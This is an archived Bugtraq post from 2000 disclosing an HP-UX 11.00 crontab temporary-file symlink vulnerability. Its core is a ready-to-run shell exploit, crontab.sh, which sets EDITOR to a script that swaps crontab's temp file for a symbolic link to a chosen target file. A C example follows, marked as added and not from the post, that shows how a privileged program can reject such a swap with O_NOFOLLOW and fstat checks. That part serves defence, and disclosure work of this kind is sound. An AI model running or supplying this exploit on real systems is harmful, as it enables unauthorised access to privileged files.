Bugtraq mailing list archives

HP-UX crontab exploit


From: Kyong-won Cho <dubhe () HACKERSLAB COM>
Date: Tue, 24 Oct 2000 10:03:04 +0900

[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link
vulnerability

Attach

====================== crontab.sh ================================

#!/bin/sh
#
#  HP-UX 11.00 crontab
#
#  Kyong-won,Cho
#
#             dubhe () hackerslab com
#
#  Usage : ./crontab.sh <distfile>
#
#

if [ -z "$1" ]
then

echo "Usage : $0 <distfile>"
exit

fi

cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh

ln -sf $1 \$1

_EOF_

chmod 755 /tmp/crontab_exp

EDITOR=/tmp/crontab_exp
export EDITOR

crontab -e 2> /tmp/crontab$$

grep -v "error on previous line" /tmp/crontab$$

rm -f /tmp/crontab_exp /tmp/crontab$$


==================================================end
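
The EDITOR script above replaces the file crontab hands it (`$1`) with a symbolic link to `<distfile>`. An added example, not part of the original post and not HP's fix, shows how a privileged program can refuse such a swap when it reopens the edited file. `reopen_edited` and `try_reopen` are hypothetical names, and the temp paths are constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: reopen the temp file after the user's editor exits.
 * Returns an fd only for a single-link regular file owned by `uid`. */
int reopen_edited(const char *path, uid_t uid)
{
    struct stat st;
    /* O_NOFOLLOW: fail if the last path component is a symlink.
     * O_NONBLOCK: do not hang if the path was swapped for a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;
    /* fstat() the descriptor, not the name, so the checks cannot be raced. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != uid || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: make a temp file in a private directory, optionally
 * swap it for a symlink, then reopen. Returns 1 accepted, 0 rejected, -1 error. */
int try_reopen(int swap_for_symlink)
{
    char dir[] = "/tmp/reopen_demo_XXXXXX", tmp[64], other[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(tmp, sizeof tmp, "%s/crontab.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    int a = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0600);
    int b = open(other, O_CREAT | O_EXCL | O_WRONLY, 0600);
    if (a < 0 || b < 0) return -1;
    close(a); close(b);
    if (swap_for_symlink && (unlink(tmp) != 0 || symlink(other, tmp) != 0))
        return -1;
    int fd = reopen_edited(tmp, geteuid());
    if (fd >= 0) close(fd);
    unlink(tmp); unlink(other); rmdir(dir);
    return fd >= 0;
}

int main(void)
{
    printf("untouched file: %d, symlink swap: %d\n", try_reopen(0), try_reopen(1));
    return 0;
}
```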

